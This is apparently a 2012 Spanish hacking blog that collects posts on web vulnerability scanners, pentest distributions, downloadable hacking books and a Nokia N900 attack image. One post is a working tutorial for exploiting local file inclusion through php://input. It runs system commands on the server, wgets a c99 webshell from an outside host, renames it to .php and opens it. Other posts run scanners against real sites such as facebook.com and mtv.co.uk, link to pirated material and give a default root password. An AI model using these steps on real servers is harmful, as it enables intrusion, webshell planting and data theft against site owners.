martes, 31 de julio de 2012

Owasp Xelenium - XSS Scanner





Xelenium es una herramienta de pruebas de seguridad que se puede utilizar para identificar las vulnerabilidades de seguridad presentes en la aplicación web. 

Xelenium utiliza el código abierto de automatización de pruebas funcionales de herramientas "Selenium", como su motor y ha sido construido usando Java Swing.

Esta versión ayuda al usuario en la identificación de la vulnerabilidad Cross Site Scripting (XSS) y las amenazas presentes en la aplicación web. En la versión posterior, Xelenium se verá reforzada de tal manera que se podrían identificar las principales vulnerabilidades.


Como esta programada en Java, en la consola tenemos que colocar el siguiente comando:

java -jar Xelenium.jar

Y se abrirá la interfaz gráfica:


La forma en que funciona esta herramienta es muy fácil, solo tenemos que colocar el sitio web que queramos auditar en "Enter URL", presionamos en "Capture Pages"  y esperamos a que la herramienta cargue los módulos del sitio web.

Terminado dicho proceso, presionamos click en "Perfom XSS Scan" por lo que la herramienta inyectara los códigos Javascript para encontrar las vulnerabilidades XSS.


Espero les sirva.

Saludos.

Metasploit Penetration Testing Cookbook


CONTENIDO:

Chapter 1: Metasploit Quick Tips for Security Professionals

- Introduction
- Configuring Metasploit on Windows
- Configuring Metasploit on Ubuntu
- Metasploit with BackTrack 5 – the ultimate combination
- Setting up the penetration testing lab on a single machine
- Setting up Metasploit on a virtual machine with SSH connectivity
- Beginning with the interfaces – the "Hello World" of Metasploit
- Setting up the database in Metasploit
- Using the database to store penetration testing results
- Analyzing the stored results of the database

Chapter 2: Information Gathering and Scanning
 
- Introduction
- Passive information gathering 1.0 – the traditional way
- Passive information gathering 2.0 – the next level
- Port scanning – the Nmap way
- Exploring auxiliary modules for scanning
- Target service scanning with auxiliary modules
- Vulnerability scanning with Nessus
- Scanning with NeXpose
- Sharing information with the Dradis framework

Chapter 3: Operating System-based Vulnerability Assessment and Exploitation

- Introduction
- Exploit usage quick tips
- Penetration testing on a Windows XP SP2 machine
- Binding a shell to the target for remote access
- Penetration testing on the Windows 2003 Server
- Windows 7/Server 2008 R2 SMB client infinite loop
- Exploiting a Linux (Ubuntu) machine
- Understanding the Windows DLL injection flaws

Chapter 4: Client-side Exploitation and Antivirus Bypass

- Introduction
- Internet Explorer unsafe scripting misconfiguration vulnerability
- Internet Explorer CSS recursive call memory corruption
- Microsoft Word RTF stack buffer overflow
- Adobe Reader util.printf() buffer overflow
- Generating binary and shellcode from msfpayload
- Bypassing client-side antivirus protection using msfencode
- Using the killav.rb script to disable antivirus programs
- A deeper look into the killav.rb script
- Killing antivirus services from the command line

Chapter 5: Using Meterpreter to Explore the Compromised Target
- Introduction
- Analyzing meterpreter system commands
- Privilege escalation and process migration
- Setting up multiple communication channels with the target
- Meterpreter filesystem commands
- Changing file attributes using timestomp
- Using meterpreter networking commands
- The getdesktop and keystroke sniffing
- Using a scraper meterpreter script

Chapter 6: Advanced Meterpreter Scripting 

- Introduction
- Passing the hash
- Setting up a persistent connection with backdoors
- Pivoting with meterpreter
- Port forwarding with meterpreter
- Meterpreter API and mixins
- Railgun – converting Ruby into a weapon
- Adding DLL and function definition to Railgun
- Building a "Windows Firewall De-activator" meterpreter script
- Analyzing an existing meterpreter script

Chapter 7: Working with Modules for Penetration Testing

- Introduction
- Working with scanner auxiliary modules
- Working with auxiliary admin modules
- SQL injection and DOS attack modules
- Post-exploitation modules
- Understanding the basics of module building
- Analyzing an existing module
- Building your own post-exploitation module

Chapter 8: Working with Exploits

- Introduction
- Exploiting the module structure
- Common exploit mixins
- Working with msfvenom
- Converting exploit to a Metasploit module
- Porting and testing the new exploit module
- Fuzzing with Metasploit
- Writing a simple FileZilla FTP fuzzer

Chapter 9: Working with Armitage 

- Introduction
- Getting started with Armitage
- Scanning and information gathering
- Finding vulnerabilities and attacking targets
- Handling multiple targets using the tab switch
- Post-exploitation with Armitage
- Client-side exploitation with Armitage

Chapter 10: Social Engineer Toolkit 

Introduction
Getting started with Social Engineer Toolkit (SET)
Working with the SET config file
Spear-phishing attack vector
Website attack vectors
Multi-attack web method
Infectious media generator

Descargar:
Formato: PDF
Peso: 3.64 MB
Paginas: 269
Idioma: Ingles
Estilo: Imágenes & Letras

Saludos.

viernes, 27 de julio de 2012

Subgraph Vega - Web Vulnerability Scanner


Vega es un escáner de Vulnerabilidades de código abierto para probar la seguridad de aplicaciones web, en la cual puede ayudarle a encontrar y validar las Inyecciones SQL, Cross-Site Scripting (XSS), Shell Injection, Local File Inclusion, Integer Overflow y otras vulnerabilidades. 

Está programada en Java y basado en una interfaz gráfica por la cual se puede ejecutar en Linux, OS X y Windows.

Vega incluye un escáner automatizado para pruebas rápidas y también un Proxy para proteger nuestra IP cuando realizamos alguna auditoria web.

Vega fue desarrollado por Subgraph en Montreal.

Actualmente esta herramienta viene incorporada en el BackTrack a partir de la version R1 y R2.

Ubicación:

Aplicaciones - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Vega

Abriendo desde la Consola/Terminal

Interfaz Gráfica de la Herramienta:


















Simple Test:

Si aun no tenes esta herramienta en tu Sistema Operativo, visita el sitio oficial del proyecto en la cual podrás descargar y leer mas sobre esta maravillosa herramienta.


Demostración

Saludos.


miércoles, 25 de julio de 2012

13 de Agosto 2012 - Lanzamiento Oficial de BackTrack 5 R3


BackTrack-Linux ha realizado una entrada en su sitio web, en la cual indican lo siguiente:

"El equipo de desarrollo de BackTrack lanzará la version R3 de nuestra Penetration Testing Distribution en 2 semanas. 

Este lanzamiento se centra en la corrección de errores y más de 50 nuevas herramientas, por lo que sera la versión mas potente.

Hemos lanzado una vista previa BT5 R3 en BlackHat Vegas para el disfrute de los asistentes a la conferencia, que se puede encontrar en bolsas de sus delegados. El DVD contiene un Gnome BT5 R3, de 32 bits grabado en formato .ISO

Vamos a llevar en nuestros últimos informes de errores y sugerencias de la herramienta BH/Defcon  para nuestro próximo lanzamiento oficial, que será el 13 de agosto de 2012.

Los usuarios actuales BT5 pueden simplemente actualizar a la última versión utilizando los comandos de actualización periódicos. 

Más información se dará a conocer junto con la lista completa de nuevas herramientas, el 13 de agosto.

Esperamos que disfrute de este comunicado de bien tanto como nosotros."

HA ESPERAR CON ANCIAS!!!

Fuente: http://www.backtrack-linux.org/backtrack/backtrack-5-r3-release-aug-13th-2012/

[Colección] Libros de Hacking & Seguridad Informática


Hola, después de unos días de inactividad por motivos de viaje, en esta oportunidad he realizado esta colección de Libros de Hacking & Seguridad Informática, para que puedan disfrutar y aprender un poco mas de este maravilloso mundo del "Hacking".

Podemos encontrar libros de Programación, Malwares, Software, Pentest, Backtrack, Windows, Linux y mucho mas!

Los libros que contiene dicha colección, son estas:











DOWNLOAD:

Link: http://pastebin.com/bUzcUgYS

Saludos.

Fuente: Hackingarticles - Raj Chandel - Editing Images By Me

miércoles, 18 de julio de 2012

Sensitive Buster v1.0 - r00tw0rm Coders



El equipo de r00tw0rm acaba de lanzar hoy una nueva herramienta, llamada "Sensitive Buster"  codeada por Th3breacher y Angel Injection. 

La herramienta encuentra las vulnerabilidades en los servidores web como tambien Paneles de Administración, Archivos y Carpetas confidenciales, Shells e incluso Copias de Seguridad (backup). 

La herramienta esta codeada en Python y es de código abierto para que todo el mundo pueda editarlo.

Uso:
  • Instalar y Activar Python
  • Abrir la consola/terminal
  • Teclear ./sensitivebuster.py

Modos:

  • -shell
  • -backup
  • -dir
  • -admin
  • -files

Ejemplo:

python buster.py http://www.facebook.com/ -m files




Utilizar la Herramienta con Proxy:

python buster.py http://www.sitio-web.com/ -m files -p 127.0.0.1:8080

Descargar Sensitive Buster: Click Aqui!
Password : r00tw0rm.com

VideoTutorial:

Fuente: TheHackerNews - Traduced By Me

martes, 17 de julio de 2012

E-Book - Gmail Hacking


Libro de Raj Chandel un Ethical Hacker, Cyber Security Expert, and Penetration Tester, en la cual explica todo lo relacionado con Gmail, podemos encontrar "trucos, tips, seguridad y hacking".

El libro contiene lo siguiente:

1. Gmail Trips &Tricks................................................................................7
1.1 How to recall sent mails .............................................................................8
1.2. Insert images in Gmail background ...........................................................9
1.3. Open Multiple Account in same browser....................................................11
1.4. How to delete e-mail Account...................................................................12
1.5. Integrate Facebook, Twitter in G-mail...................................................... 13
1.6. Most contacted E-mail Addresses in Gmail ................................................. 16
1.7. Gmail Goggles.............................................................................................. .17
1.8. Insert images in Gmail mail.......................................................................... 18
1.9. How to delete spam messages automatically.............................................. 19
1.10. G-mail shortcuts .......................................................................................... 20
1.11. Backup your G- mail inbox online ................................................................ 21
1.12. How to send bulk mail...................................................................................22
1.13. How to convert a Gmail Account into a MP3 Player....................................26
2. G-mail Web Apps...........................................................................................27
2.1. How to send mail in Future ......................................................................28
2.2. How to find big mail ....................................................................................... 29
2.3. How to Send Self destructing E-mail ............................................................... 31
2.4. Search your E-mail without login Gmail ......................................................... 33
2.5. Convert your E-mail into task ......................................................................... 34
2.6. How to Track Mail ........................................................................................... 35
2.7. How to find valid E-mail Address ................................................................... 36
2.8. Online Email Tracer ........................................................................................ 37
2.9. Remove side bar ADS in Gmail ...................................................................... 38
2.10. True Switch ................................................................................................. 39
2.11. Message in your mobile .............................................................................. 40
2.12. Send mail in your mobile ............................................................................ 41
3. Gmail Security ............................................................................................... 43
3.1. How to find if your Gmail Account has been hacked or not ........................ 44
3.2. How to protect your Gmail Account ............................................................. 45
3.3. Gmail Account security with 2 step verification ............................................ 46
3.4. How to trace sender information .................................................................. 47
4. Gmail Hacking................................................................................................. 48
4.1. Gmail Password Decryptor ............................................................................ 49
4.2. How to view hidden Password behind........................................................ 50
4.3. Web Browser pass view .............................................................................. 51
4.4. How to hack Gmail Account (Phishing) ..................................................... 52
4.5. How to hack Gmail password using Gmail Hacker ................................... 53
4.6. Hack Gmail account password with key logger ....................................... 55
5. Gmail Tools ............................................................................................... 65
5.1. How to backup your Email into a pen drive (mail stores) ........................ 66
5.2. SYNC DOCS ............................................................................................... 69
5.3. Use Gmail as a hard Drive ........................................................................ 70
5.4. G- Watchman ............................................................................................ 71
5.5. List of G mail Tools ....................................................................................... 72

Descargar Libro: http://www.sendspace.com/file/jg6fjw
Autor: Raj Chandel

domingo, 15 de julio de 2012

PwnieExpress - Pentesting en Nokia N900


PwnPhone
Un Nokia N900 basado en la plataforma Pentesting.

PwnieExpress una de la mejor suite de Pentesting para el Nokia N900. Incluye Aircrack, Metasploit, Kismet, GrimWEPa, SET, FastTrack, Ettercap, Nmap y mucho más. 

La pantalla es totalmente personalizada para el Pentesting con accesos directos a Macchanger, incorporado en la tarjeta inalámbrica compatible con la inyección de paquetes, el modo monitor y el modo promiscuo también está disponible.

Principal Pantalla del Escritorio:
1. Conky - Para ver el uso del sistema y stats
2. Promiscuous_on_off - Script para activar el modo promiscuo de manera intermitente durante wlan0
3. xterm RootShell - el acceso de root shell en el directorio /home/usuario/MyDocs/pwnphone
4. Macchanger - Rolls dirección MAC de la tarjeta inalámbrica wlan0 y los cambios de nombre de host a "DellPC"
5. Nmap - Versión de línea de Comando de Nmap
6. Zenmap - Versión GUI de Nmap
7. InjectionON - Carga los controladores necesarios para la inyección de paquetes inalámbrico
8. InjectionOFF - Descarga los controladores de la inyección de paquetes y vuelve a cargar los controladores normales wifi
9. Airodump-ng - Rápido acceso a la tecnología inalámbrica sniffer, ejecutando: airodump-ng wlan0
10. Kismet - Wireless Sniffer / herramienta de mapeo
11. Wifite - Herramienta de ataque Wirelles automatizado
12. Wifizoo - Herramienta inalámbrica para olfatear las sesiones activas en el wifi
13. Grimwepa - Hherramienta en GUI que se utilizan con la suite aircrack-ng - WEP / WPA cracking
14. Wepbuster - Automáticamente rompe las redes inalámbricas de WEP en el rango (¡cuidado!)
15. El modo promiscuo en el botón de off - Activa el modo promiscuo en wlan0
16. Wireshark - acceso directo del escritorio - analizador de paquetes / sniffer
17. Tshark - La versión CMD línea de Wireshark - Se ejecuta en wlan0
18. Tcpdump - Ejecutar tcpdump en wlan0 (tcpdump-s0-n-i wlan0)
19. Sslstrip - Herramienta utilizada para despojar a los sitios web de SSL y oler las credenciales
20. Scapy - Interfaz Scapy - la manipulación de paquetes interactivos
21. Nikto - Herramienta Web de exploración de vulnerabilidades
22. SET - Kit de herramientas de Ingeniería Social
23. Metasploit - la versión del CMD msf3 (msfconsole)
24. Metasploit-GUI - versión GUI de msf3
25. Fasttrack - Herramienta automatizada pentesting
26. EttercapNG-Curses - Version Curses de EttercapNG
27. EttercapNG-GUI - versión GUI de EttercapNG

Algunas Imagenes de las Herramientas:


Para poder obtener todas estas aplicaciones en nuestro Nokia N900, tenemos que ingresar a la pagina oficial del proyecto http://pwnieexpress.com/products/pwnphone y comprar dicho archivo, la cual el precio es de $960.00 USD
Pero si ya tenes el Nokia N900 en tus manos, te facilitare las aplicaciones totalmente gratis !! solo tenes que dirigirte a este link para descargar la aplicación:


Extraes el archivo tar.gz y podrás ver una carpeta con el nombre "pwnimage" luego abres esa carpeta y habrá un archivo de instrucciones sobre "Como Instalar Pwnie Express" sigues todas las instrucciones y   voila!! tendrás tu MÓVIL listo para realizar Pruebas de Penetración!

Acceso SHH:
Username: root
Password: pwnphone
Ruta: /home/user/MyDocs/pwnphone

Espero te guste...

Saludos.

sábado, 14 de julio de 2012

Subiendo Shell Explotando LFI via PHP:INPUT


Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.


Que es el LFI? 

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio. 

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd 

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar 


Ahora vamos a tratar de poner este método en acción.



Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>
Ejemplo:






Otros comandos:

Lista de directorios
<? system ('ls'); ?>


Identificación
<? system ('id'); ?>



Convertir el formato 
<? system ('mv file.txt file.php'); ?>


Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.


Utilizaremos esta shell en .txt: http://r57.biz/c99.txt

<? system ('wget http://r57.biz/c99.txt'); ?>




Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>













Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php



Ahora, en este caso nos dirigimos a www.sitio-web.com/calebbucker.php y Voila tenemos nuestra shell!!

No Entendistes?

Observa el VideoTutorial en 1080p HD!

Espero te sirva y lo uses con prudencia.

Saludos.

viernes, 13 de julio de 2012

Offensive Security Lab Exercises


Hola, en esta oportunidad les dejare un interesante Libro de Offensive Security, en la cual explican el funcionamiento y uso de algunas herramientas del BackTrack, así como también algunos métodos de ataques y defensa en el campo de la Seguridad Informática.

Dicho libro, contiene 324 paginas de pura información interesante, en la cual se encuentran los siguientes tutoriales:




1. Module 1 - BackTrack Basics
1.1 Finding your way around the tools
1.1.1 Exercise 1
1.2 Basic Services
1.2.1 DHCP
1.2.2 Static IP assignment
1.2.3 Apache
1.2.4 SSHD
1.2.5 Tftpd
1.2.6 VNC Server
1.2.7 Exercise 2
1.3 Basic Bash Environment
Overview
1.3.1 Simple Bash Scripting
1.3.2 Exercise 3
1.3.3 Possible Solution for ICQ Exercise
1.3.4 Exercise 4
1.4 Netcat The Almighty
Overview
1.4.1 Connecting to a TCP/UDP port with Netcat
1.4.2 Listening on a TCP/UDP port with Netcat
1.4.3 Transferring files with Netcat
1.4.4 Remote Administration with Netcat
1.4.4.1 Scenario 1 – Bind Shell
1.4.4.2 Scenario 2 – Reverse Shell
1.4.5 Exercise 5
1.5 Using WireShark (Ethereal)
Overview
1.5.1 Peeking at a Sniffer
1.5.2 Capture filters
1.5.3 Following TCP Streams
1.5.4 Exercise 6 
2. Module 2- Information Gathering Techniques
A note from the authors
2.1 Open Web Information Gathering
Overview
2.1.1 Google Hacking
2.1.1.1 Advanced Google Operators
2.1.1.2 Searching within a Domain
2.1.1.3 Nasty Example #1
2.1.1.4 Nasty Example #2
2.1.1.5 Email Harvesting
2.1.1.6 Finding Vulnerable Servers using Google
2.1.1.7 Google API
2.2. Miscellaneous Web Resources
2.2.1 Other search engines
2.2.2 Netcraft
2.2.3 Whois Reconnaissance
2.3 Exercise 7
3. Module 3- Open Services Information Gathering
A note from the authors
3.1 DNS Reconnaissance
3.1.1 Interacting with a DNS server
3.1.1.1 MX Queries
3.1.1.2 NS Queries
3.1.2 Automating lookups
3.1.3 Forward lookup bruteforce
3.1.4 Reverse lookup bruteforce
3.1.5 DNS Zone Transfers
3.1.6 Exercise 8
3.2 SNMP reconnaissance
3.2.1 Enumerating Windows Users
3.2.2 Enumerating Running Services
3.2.3 Enumerating open TCP ports
3.2.4 Enumerating installed software
3.2.5 Exercise 9 
3.3 SMTP reconnaissance
3.3.1 Exercise 10
3.4 Microsoft Netbios Information Gathering
3.4.1 Null sessions
3.4.2 Scanning for the Netbios Service
3.4.3 Enumerating Usernames
3.4.4 Exercise 11
4. Module 4- Port Scanning
A note from the authors
4.1 TCP Port Scanning Basics
4.2 UDP Port Scanning Basics
4.3 Port Scanning Pitfalls
4.4 Nmap
4.5 Scanning across the network
4.5.1 Exercise 11 
4.6 Unicornscan
5. Module 5- ARP Spoofing
A note from the authors
5.1 The Theory
5.2 Doing it the hard way
5.2.1 Victim Packet
5.2.2 Gateway Packet
5.3 Ettercap
5.3.1 DNS Spoofing.
5.3.2 Fiddling with traffic
5.3.3 Exercise 12
6. Module 6- Buffer overflow Exploitation (Win32)
A note from the authors
Overview
6.1 Looking for the Bugs
6.2 Fuzzing
6.3 Replicating the Crash
6.4 Controlling EIP
6.4.1 Binary Tree analysis
6.4.2 Sending a unique string
6.5 Locating Space for our Shellcode
6.6 Redirecting the execution flow
6.7 Finding a return address
6.7.1 Using OllyDbg
6.8 Getting our shell
6.9 Improving exploit stability
6.9.1 Exercise 13
7. Module 7- Working With Exploits
7.1 Looking for an exploit on BackTrack
7.1.1 RPC DCOM Example
7.1.2 Wingate Example
7.1.3 Exercise 14
7.2 Looking for exploits on the web
7.2.1 Security Focus
7.2.2 Milw0rm.com
8. Module 8- Transferring Files
Exercise
8.1 The non interactive shell
8.2 Uploading Files
8.2.1 Using TFTP
8.2.1.1 TFTP Pros 
8.2.1.2 TFTP Cons 
8.2.2 Using FTP
8.2.3 Inline Transfer - Using echo and DEBUG.exe
8.3 Exercise 15
9. Module 9 – Exploit frameworks
9.1 Metasploit
9.1.1 Metasploit Command Line Interface (MSFCLI)
9.1.2 Metasploit Console (MSFCONSOLE)
9.1.3 Metasploit Web Interface (MSFWEB)
9.1.4 Exercise 16
9.1.5 Interesting Payloads
9.1.5.1 Meterpreter Payload
9.1.5.2 PassiveX Payload
9.1.5.3 Binary Payloads
9.1.6 Exercise 17
9.1.7 Framework v3.0
9.1.7.1 Framework 3 Auxiliary Modules
9.1.8 Framework v3.0 Kung Foo
9.1.8.1 db_autopwn
9.1.8.2 Kernel Payloads
9.1.9 Exercise 18
9.2 Core Impact
9.2.1 Exercise 19
10. Module 10- Client Side Attacks
A note from the authors
10.1 Client side attacks
10.2 MS04-028
10.3 MS06-001
10.4 Client side exploits in action
10.5 Exercise 20
11. Module 11- Port Fun
A note from the authors
11.1 Port Redirection
11.2 SSL Encapsulation - Stunnel
11.2.1 Exercise 21
11.3 HTTP CONNECT Tunneling
11.4 ProxyTunnel
11.4.1 Exercise 22
11.5 SSH Tunneling
11.6 What about content inspection ?
12. Module 12- Password Attacks
A note from the authors
12.1 Online Password Attacks
12.2 Hydra
12.2.1 FTP Bruteforce
12.2.2 POP3 Bruteforce
12.2.3 SNMP Bruteforce
12.2.4 Microsoft VPN Bruteforce
12.2.5 Hydra GTK
12.3 Password profiling
12.3.1 WYD
12.4 Offline Password Attacks
12.4.1 Windows SAM
12.4.2 Windows Hash Dumping – PWDump / FGDump
12.4.3 John The Ripper
12.4.4 Rainbow Tables
12.4.5 Exercise 24
12.5 Physical Access Attacks
12.5.1. Resetting Microsoft Windows
12.5.2 Resetting a password on a Domain Controller
12.5.3 Resetting Linux Systems
12.5.4 Resetting a Cisco Device 
13. Module 13 - Web Application Attack vectors
13.1 SQL Injection
13.1.1 Identifying SQL Injection Vulnerabilities
13.1.2 Enumerating Table Names
13.1.3 Enumerating the column types
13.1.4 Fiddling with the Database
13.1.5 Microsoft SQL Stored Procedures
13.1.6 Code execution
13.2 Web Proxies
13.3 Command injection Attacks
13.3.1 Exercise 25
14. Module 14 - Trojan Horses
14.1 Binary Trojan Horses
14.2 Open source Trojan horses
14.2.1 Spybot
14.2.2 Insider
14.3 World domination Trojan horses
14.3.1 Rxbot
15. Module 15 - Windows Oddities.
15.1 Alternate NTFS data Streams
15.1.1 Exercise 26
15.2 Registry Backdoors
15.2.1 Exercise 27
16. Module 16 - Rootkits
16.1 Aphex Rootkit
16.2 HXDEF Rootkit
16.3 Exercise R.I.P
Final Challenges.
Tasks


Disfruten...

jueves, 12 de julio de 2012

WordPress Security Fingerprinter Exploit-DB

Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: WPSFp Click Aqui

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com/

En este caso yo he colocado, el link http://www.noticiasdehackers.com/ para poner a prueba la herramienta, como se aprecia en la siguiente imagen:



Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.

Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.

miércoles, 11 de julio de 2012

Suse Studio: Crea Tu Distro Linux Personalizada



Esta gran utilidad que ofrece ya hace tiempo los buenos de OPENSUSE (Suse para los amigos) y es una pagina web para la creacion online de una distro Linux basada en opensuse a la que puedes añadir todas los programas que tienen disponibles para su posterior cocinado.

Link del Sitio Web: http://susestudio.com/

Con lo primero que nos topamos es con su visualmente cuidada web que tras hacer login nos muestras los tipos de escritorios y la configuracion basica a usar.




Justo debajo tienes 2 opciones para elegir la arquitectura 32 y 64 Bits tambien puedes ponerle nombre a tu nueva creacion.

En la parte superior tienes una pestaña llamada software y nos sirve para pre-instalar las futuras aplicaciones que deseamos que tenga nuestro opensuse. 

Cuando hayas terminado de instalar las aplicaciones dirigete a Build para poder terminar con los ultimos ajustes.

Ahora solo queda bajar el .iso de la web, la grabamos en un dvd/usb o usar el vmware.

Saludos.

DPScan Drupal Security Scanner



Hay distintos CMS (Content Management System) como WordPress, Joomla, CMS y Drupal. Existen diferentes herramientas qeue están disponibles para enumerar en Wordpress y Joomla y para encontrar las vulnerabilidades conocidas en Wordpress y Joomla, pero no hay ninguna herramienta para otros sistema común de gestión de contenido como Drupal.

Esta pequeña herramienta es pública y accesible para que la utilizemos a nuestro gusto. Puede ayudar a otros auditores o probadores de penetración de hacer su trabajo más rápido, aquí es una pequeña demostración. Después de descargar el script (en python).

Descargamos la Herramienta: Click Aqui


Ejecutamos:

root@bt:cd Desktop
root@bt:~/Desktop# python DPScan.py
DRUPAL Modules Enumerator v0.1beta-- written by Ali Elouafiq 2012
<ScriptName> [filename.txt]
<ScriptName> [URL]
<ScriptName> [URL] user password // FOR HTTP AUTHORIZATION

Probando la Tool:

root@bt:~/Desktop# python DPScan.py www.mtv.co.uk
node
user_optin
fckeditor
system
gsa
mtv_videobrowse
nice_menus
user
cck
top_tabs
panels
jquery_update
root@bt:~/Desktop#


Ahora, ya sabemos lo que contiene el sitio web...

Saludos.